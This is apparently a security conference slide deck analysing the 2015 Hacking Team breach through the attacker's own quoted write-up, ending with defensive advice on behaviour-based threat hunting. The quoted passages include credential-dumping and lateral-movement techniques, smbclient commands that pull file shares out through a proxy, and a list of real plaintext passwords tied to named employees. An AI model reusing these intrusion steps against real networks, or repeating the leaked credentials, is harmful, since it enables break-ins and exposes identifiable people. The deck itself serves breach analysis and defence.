Date post: | 09-Apr-2017 |
Category: |
Technology |
Upload: | north-texas-chapter-of-the-issa |
View: | 3,673 times |
Download: | 0 times |
© 2016 Cybereason Inc. All rights reserved.
The“HackBack”HowHackingTeambecame“HackedTeam”
BradGreen,Sr.SalesEngineer
© 2016 Cybereason Inc. All rights reserved.
TheHackersareHacked
HackingTeamdataexfiltrationearlyJuly2015
HackingTeam’stwitteraccount(@hackingteam)ishijackedandpostslinksto400+GBtorrentfileonJuly5,2015
Websitedefacedtoread“HackedTeam”
© 2016 Cybereason Inc. All rights reserved.
InsidetheTorrentFileAlloftheexchangeserverdata
AlloftheRCSinstallers+manuals+sourcecode
Importantandprivatedocuments
Screenshotsfromemployeesmachines
EntireGITrepository
PiratedsoftwareandpiratedversionsofOperatingsystems
3fullserverimages(WindowsAttackserver,Androidattackserverandthehelpdesksupportserver)
© 2016 Cybereason Inc. All rights reserved.
TTP’s:ARefresher
Tactics:
Procedures:
Uniquewaysormethodsperformedtoaccomplishagoal
Techniques:
Standardized,detailed stepsthatprescribehowtoperformspecifictasks
Theartorskills employedas meanstoaccomplishanend
© 2016 Cybereason Inc. All rights reserved.
Tactics
Solerelianceon0-dayexploits
100%endpointPrivilegeescalation
OperationsmirroringFlameCapabilities
Useofnewsandadword services“adhosting”– C&Cusenews-relatedjargon
Single-shotcampaignstiedtoultraspecifictargets
AlgorithmicassessmentoftargetOSbrowser
Switchexploitsinreal-timebasedonendpointassessment
AbilitytoexploitanyWindowsOSXPandAbove
AbilitytoexploitANYMobileOperatingSystemincludingSymbian
© 2016 Cybereason Inc. All rights reserved.
Techniques
GainNTAUTHORITY\SYSTEMprivilegesintheSYSTEMshell,thenexecutetheagent.exe fortheRCSclient
Spear-phishingandwaterholedeliverymechanisms
NetworkInjectorandBinaryMelter
Lazylooking404errorpagesusedfornon-intendedtargets
Useof0-dayexploitsforFlashandJava(andSilverlight?)
UseoftheWindowskernelvulnerability(CVE-2015-2387)intheopentypefontmanagermodule(ATMFD.dll)— canbypasssandboxmitigationmechanism
UseofUEFIBIOSRootkittokeepRemoteControlSystemagentpersistent
© 2016 Cybereason Inc. All rights reserved.
NetworkInjector
“. . .a particularly nasty tool that would be plugged into an upstream or ISP backbone. Once active, the network injector would be able to identify the target(s) based on a customer defined rule set and wait for the victim to visit a specific URL, such as YouTube.com. Then, it would automatically redirect the victim to the team’s infection server instead.”
Melter could be used in conjunction with Network injector to “melt” the RCS binary into benign software during download
© 2016 Cybereason Inc. All rights reserved.
Procedures
Registered domainsinTelAvivunderthe nameDavidCohen(theIsraeliequivalentof“JohnSmith")
Followinfectionserverprocessbelowforexacttargetexploitation
RequestcloudbasedanonymizingservicepriortoexploitationanddeliverytoevadeattributionusingVirtualPrivateServer
© 2016 Cybereason Inc. All rights reserved.
Whodidit?
Singleactortakescredit
http://pastebin.com/raw/GPSHF04A (Spanish)http://pastebin.com/raw/0SNSvyjJ (English)
Pastebin postonApril15th,2016inSpanish(followedbyEnglishtranslation)
PartManifesto
PartDIYGuide
PartPlay-by-Play
CompletelyFascinating
© 2016 Cybereason Inc. All rights reserved.
Histhoughtprocess
“Inthenewsweoftenseeattackstracedbacktogovernment-backed hackinggroups("APTs"), becausetheyrepeatedlyusethesametools, leavethesamefootprints, andevenusethesameinfrastructure (domains, emails,etc).They'renegligent becausetheycanhackwithoutlegalconsequences.”
“Ididn'twanttomakethepolice'sworkanyeasierbyrelatingmyhackofHackingTeamwithotherhacksI'vedoneorwithnamesIuseinmyday-to-dayworkasablackhat hacker.So,Iusednewserversanddomainnames,registeredwithnewemails,andpayed forwithnewbitcoinaddresses.Also, Ionlyusedtoolsthatarepubliclyavailable,orthings thatIwrotespecificallyfor thisattack,andIchangedmywayofdoingsomethings tonotleavemyusualforensic footprint.”
© 2016 Cybereason Inc. All rights reserved.
Recon- TTPs
“Although itcanbetedious, thisstageisveryimportant, sincethelargertheattacksurface,theeasieritistofindaholesomewhereinit.”
DomainandSubdomain Enumeration
WHOISandReverseLookups
Scanning
“Thecompany'sIDSmightgenerateanalert,butyoudon'thavetoworrysincethewholeinternet isbeingscannedconstantly.”
SocialInfo
Linkedindata.comMetadatafrompublished datafiles
© 2016 Cybereason Inc. All rights reserved.
Infiltration
Phishing?
“Ididn'twanttotrytospearphishHackingTeam,astheirwholebusiness ishelpinggovernments spearphish theiropponents, sothey'dbemuchmore likelytorecognizeandinvestigateaspearphishing attempt.”
BuyAccess?
“Thankstohardworking Russiansandtheirexploitkits,trafficsellers,andbotherders,manycompaniesalreadyhavecompromised computers intheirnetworks.AlmostalloftheFortune500,withtheirhugenetworks,havesomebotsalreadyinside.However,HackingTeamisaverysmallcompany,andmostofit'semployeesareinfosec experts, sotherewasalowchancethatthey'dalreadybeencompromised.”
© 2016 Cybereason Inc. All rights reserved.
Exploitation
HackingTeamhasarangeofpublicIP:inetnum:93.62.139.32- 93.62.139.47descr:HTpublicsubnet
“Whattheyhadwastheirmainwebsite(aJoomlabloginwhichJoomscan[2]didn'tfindanythingserious),amailserver,acouple routers, twoVPNappliances,andaspamfilteringappliance.”
“So,Ihadthreeoptions: look fora0dayinJoomla,look fora0dayinpostfix,orlookfora0dayinoneoftheembedded devices.”
“A0dayinanembeddeddeviceseemedliketheeasiestoption,andaftertwoweeksofworkreverseengineering, Igotaremoterootexploit.Sincethevulnerabilities stillhaven'tbeenpatched,Iwon'tgivemoredetails...”
“Theworstthingthatcouldhappenwouldbeformybackdoororpost-exploitationtoolstomakethesystemunstableandcauseanemployeetoinvestigate.SoIspentaweektestingmyexploit,backdoor,andpost-exploitation toolsinthenetworksofothervulnerablecompaniesbeforeenteringHackingTeam'snetwork.”
© 2016 Cybereason Inc. All rights reserved.
Post-Exploitation/C2/Persistence
“Ididalotofworkandtestingbeforeusing theexploitagainstHackingTeam.Iwroteabackdoored firmware,andcompiledvariouspost-exploitation toolsfor theembedded device.Thebackdoorservestoprotecttheexploit.Usingtheexploit justonceandthenreturning through thebackdoormakesithardertoidentifyandpatchthevulnerabilities.”
1) busybox2) nmap3) Responder.py
The most useful tool to attack Windows networks when you have access tothe internal network but do not have a domain user.
4) Python5) tcpdump6) Dsniff
I wanted to use ettercap, written by Hacking Team's own ALoR and NaGA, but it was hard to compile it for the system.
7) socat
8) screenLike the shell with pty, it wasn't really necessary, but I wanted to feel at home in Hacking Team's
network.
9) a SOCKS proxy server
To use with proxychains to access the internal network with anyanother program.
© 2016 Cybereason Inc. All rights reserved.
ExploitationSuccessful
“Nowinsidetheirinternalnetwork, Iwantedtotakealookaroundandthinkaboutmynextstep.IstartedResponder.py inanalysismode(-Atolistenwithoutsendingpoisoned responses), anddidaslowscanwithnmap.”
“JustwhenIwasworried thatthey'dfinallypatchedallof theauthenticationbypassbugs inMySQL[2][3][4][5],newdatabasescameintostylethatlackauthenticationbydesign.Nmap foundafewinHackingTeam'sinternalnetwork:”
“TheywerethedatabasesfortestinstancesofRCS.TheaudiothatRCSrecordsisstoredinMongoDB withGridFS.Theaudiofolder inthetorrent[6]camefromthis.Theywerespyingonthemselveswithoutmeaningto.”
27017 / tcp open MongoDB MongoDB 2.6.5| mongodb-databases:| ok = 1| totalSizeMb = 47547| totalSize = 49856643072...| _ Version = 2.6.5
27017 / tcp open MongoDB MongoDB 2.6.5| mongodb-databases:| ok = 1| totalSizeMb = 31987| totalSize = 33540800512| DATABASES...| _ Version = 2.6.5
© 2016 Cybereason Inc. All rights reserved.
InternalReconFindsFruit
“Theirinsecurebackupswerethevulnerability thatopened theirdoors.According totheirdocumentation [1],theiriSCSIdevicesweresupposed tobeonaseparatenetwork,butnmap found afewintheirsubnetwork”
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)...3260 / tcp open iscsi?| iscsi-info:| Target: iqn.2000-01.com.synology: ht-synology.name| Address: 192.168.200.66:3260,0| _ Authentication: No authentication required
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)...3260 / tcp open iscsi?| iscsi-info:| Target: iqn.2000-01.com.synology: synology-backup.name| Address: 10.0.1.72:3260,0| Address: 192.168.200.72:3260,0| _ Authentication: No authentication required
“iSCSIneedsakernelmodule, anditwould'vebeendifficult tocompileitfortheembedded system.Iforwarded theportsothatIcouldmount itfromaVPS:”
© 2016 Cybereason Inc. All rights reserved.
MounttheNAS
[Alotofcomplicatedworkwithtrafficforwarding andVPS]
“...thedevicefileappears!Wemount it...andfindbackupsofvariousvirtualmachines.TheExchangeserverseemedlikethemostinteresting. Itwastoobigtoodownload, butitwaspossible tomount itremotelytolookforinteresting files:”
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk$ fdisk -l /dev/loop0/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
“Whatinterestedmemostinthebackupwasseeingifithadapasswordorhashthatcouldbeusedtoaccesstheliveserver.Iusedpwdump, cachedump,andlsadump [1]ontheregistryhives.lsadump found thepasswordtothebesadmin serviceaccount:”_SC_BlackBerry MDS Connection Service0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
© 2016 Cybereason Inc. All rights reserved.
ExploretheBackups“Iusedproxychains [2]withthesocksserverontheembedded deviceandsmbclient[3]tocheckthepassword:“
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!’
“Itworked!Thepasswordforbesadmin wasstillvalid,andalocaladmin.Iusedmyproxyandmetasploit's psexec_psh [4]togetameterpreter session.ThenImigratedtoa64bitprocess,ran"loadkiwi"[5],"creds_wdigest", andgotabunchofpasswords, including theDomainAdmin:”
© 2016 Cybereason Inc. All rights reserved.
ThePasswordsHACKINGTEAM BESAdmin bes32678!!!HACKINGTEAM Administrator uu8dd8ndd12!HACKINGTEAM c.pozzi P4ssword <---- lol great sysadminHACKINGTEAM m.romeo ioLK/(90HACKINGTEAM l.guerra 4luc@=.=HACKINGTEAM d.martinez W4tudul3spHACKINGTEAM g.russo GCBr0s0705!HACKINGTEAM a.scarafile Cd4432996111HACKINGTEAM r.viscardi Ht2015!HACKINGTEAM a.mino A!e$$andraHACKINGTEAM m.bettini Ettore&Bella0314HACKINGTEAM m.luppi Blackou7HACKINGTEAM s.gallucci 1S9i8m4o!HACKINGTEAM d.milan set!dob66HACKINGTEAM w.furlan Blu3.B3rry!HACKINGTEAM d.romualdi Rd13136f@#HACKINGTEAM l.invernizzi L0r3nz0123!HACKINGTEAM e.ciceri 2O2571&2EHACKINGTEAM e.rabe erab@4HT!
”Many have madefun ofChristianPozzi's weak passwords...””...The reality isthat mimikatz andkeyloggers view all passwords equally.”
© 2016 Cybereason Inc. All rights reserved.
AwordonLateralMovement
RemoteMovement:1)psexec Thetriedandtruemethod forlateralmovementonwindows.
2)WMIThemoststealthymethod.TheWMIserviceisenabledonallwindowscomputers,butexceptforservers,thefirewallblocksitbydefault
3)PSRemoting [10]It'sdisabledbydefault,andIdon't recommendenablingnewprotocols. But,ifthesysadmin hasalreadyenabled it,it'sveryconvenient, especiallyifyouusepowershell foreverything (andyoushouldusepowershell foralmosteverything, itwillchange[11]withpowershell 5andwindows10,butfornowpowershell makesiteasytodoeverything inRAM,avoidAV,andleaveasmallfootprint)
4)ScheduledTasksYoucanexecuteremoteprogramswithatandschtasks [5].Itworksinthesamesituationswhereyoucouldusepsexec,anditalsoleavesawellknown footprint [12].
5)GPOIfallthoseprotocolsaredisabledorblockedbythefirewall,onceyou're DomainAdmin, youcanuseGPOtogiveusersaloginscript,installanmsi,executeascheduled task[13],or,likewe'llseewiththecomputerofMauroRomeo(oneofHackingTeam'ssysadmins),useGPOtoenableWMIandopen thefirewall.
© 2016 Cybereason Inc. All rights reserved.
Awordon”In-Place”Movement(Changingcontext)
1)TokenStealingOnceyouhaveadminaccessonacomputer, youcanusethetokensoftheotheruserstoaccessresourcesinthedomain.Twotools fordoing thisareincognito [1]andthemimikatz token::*commands [2].
2)MS14-068Youcantakeadvantageofavalidationbug inKerberos togenerateDomainAdmin tickets[3][4][5].
3)PasstheHashIfyouhaveauser'shash,butthey'renotlogged in,youcanusesekurlsa::pth [2]togetaticketfortheuser.
4)ProcessInjectionAnyRATcaninjectitselfintootherprocesses.Forexample,themigratecommand inmeterpreter andpupy [6],orthepsinject [7]commandinpowershell empire.Youcaninjectinto theprocessthathasthetokenyouwant.5)runas Thisissometimesveryuseful sinceitdoesn'trequireadminprivileges. Thecommand ispartofwindows,butifyoudon'thaveaGUIyoucanuse powershell [8].
© 2016 Cybereason Inc. All rights reserved.
“Oneofmyfavoritehobbiesishuntingsysadmins”
“Readingtheirdocumentation abouttheirinfrastructure [1],IsawthatIwasstillmissingaccesstosomething important - the"ReteSviluppo", anisolatednetworkwiththesourcecodeforRCS.Thesysadmins ofacompanyalwayshaveaccesstoeverything, soIsearchedthecomputersofMauroRomeoandChristianPozzi toseehowtheyadministertheSviluppo network,andtoseeiftherewereanyotherinterestingsystemsIshould investigate.Itwassimpletoaccesstheircomputers, sincetheywerepartofthewindowsdomainwhereI'dalreadygottenadminaccess.MauroRomeo'scomputerdidn'thaveanyportsopen, soIopened theport forWMI[2]andexecutedmeterpreter [3].Inaddition tokeylogging andscreenscrapingwithGet-KeystrokesandGet-TimeScreenshot, Iusedmany/gather/modules frommetasploit,CredMan.ps1[4],andsearchedfor interesting files[5].Uponseeing thatPozzi hadaTruecrypt volume, Iwaiteduntilhe'dmounted itandthencopiedoffthefiles.”
© 2016 Cybereason Inc. All rights reserved.
TheBridge
“WithinChristianPozzi's Truecrypt volume, therewasatextfilewithmanypasswords[1].OneofthosewasforaFullyAutomatedNagios server,whichhadaccesstotheSviluppo networkinorder tomonitor it.I'dfound thebridge Ineeded.Thetextfilejusthadthepassword tothewebinterface,buttherewasa publiccodeexecutionexploit[2](it'sanunauthenticated exploit,butitrequiresthatatleastoneuserhasasessioninitiated, forwhichIusedthepassword fromthetextfile).”
© 2016 Cybereason Inc. All rights reserved.
DataExfiltration
“WiththeDomainAdminpassword, Ihaveaccesstotheemail,theheartofthecompany.ICuriously, Ifound abugwithPowershell's datehandling.Afterdownloading theemails,ittookmeanothercoupleweekstogetaccesstothesourcecodeandeverythingelse,soIreturnedeverynowandthentodownload thenewemails.TheserverwasItalian,withdatesintheformatday/month/year. Iused:”-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
“NowthatI'dgottenDomainAdmin, Istartedtodownload filesharesusingmyproxyandthe-Tcoption ofsmbclient, forexample:”
proxychains smbclient '//192.168.1.230/FAE DiskStation' \ -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*’c“Idownloaded theAmministrazione, FAEDiskStation,andFileServer folders inthetorrent likethat.”
© 2016 Cybereason Inc. All rights reserved.
WhatitMeans– TTP’sReignSupreme• RecompileHash Values
• ObfuscatorSignatures
• Stolen Credit Card
Domain names
• Botnet, Hacked Server, Hosting
IP Addresses
• Custom developmentTools
• Years of innovationTTPs
© 2016 Cybereason Inc. All rights reserved.
WhatitMeans– MITREATT&CKModelAdversarialTactics,Techniques,&CommonKnowledge
© 2016 Cybereason Inc. All rights reserved.
WhatitMeans– Hunt!
Sec. Min. Hrs. Days Weeks Months
Damage
Time
Penetration↓
Hackingoperation↓
Breachdetected↓
SpreadRecon DamageC&CBreach
Increasefocusonactivelyhuntingyouradversaryattheendpoint
StaticIOC’simportantbutnotenough– detectattackersbytheirbehavior
© 2016 Cybereason Inc. All rights reserved.
InterestingThingsSilverlightExploit:CVE-2016-0034(JanuaryMS16-006):• PurchasedfromVitaliy Toropov for$45kin2013• Toropov claimsitwaswritten2.5yearsprior• KasperskyresearcherswriteYARArulebasedonPOCcode
fromemail• FirstYARAhitNovember25,2015(compiled July21,2015)
© 2016 Cybereason Inc. All rights reserved.
InterestingThings
Atthetimeofthebreach:
tmp_priveschasa0/55onVTMynewsfeeds.info isprettyclean,too
Followingthebreach,dozensofhashesstartedshowinguponVT–likelyduetonumerousgroupsdownloadingandcompilingthecode
© 2016 Cybereason Inc. All rights reserved.
InterestingThingsInternalPostingspeculatingthenumberofzero-daysareinplay.-Assumeszero-daypersistsforaverageof312daysbeforedetection-ReferencesStefanFrei(NSSLabsinAustin)
“Freisaidthatinlightofthepresentzero-dayreality,hehasthreepiecesofadviceforC-Levelexecutives:-Assume youarecompromised,andthatyouwillgetcompromisedagain.-Preventionislimited;investinbreachdetectionsothatyoucanquicklyfindandactonanycompromises.-Make sureyouhaveaprocessforproperlyrespondingtocompromiseswhentheydohappen.”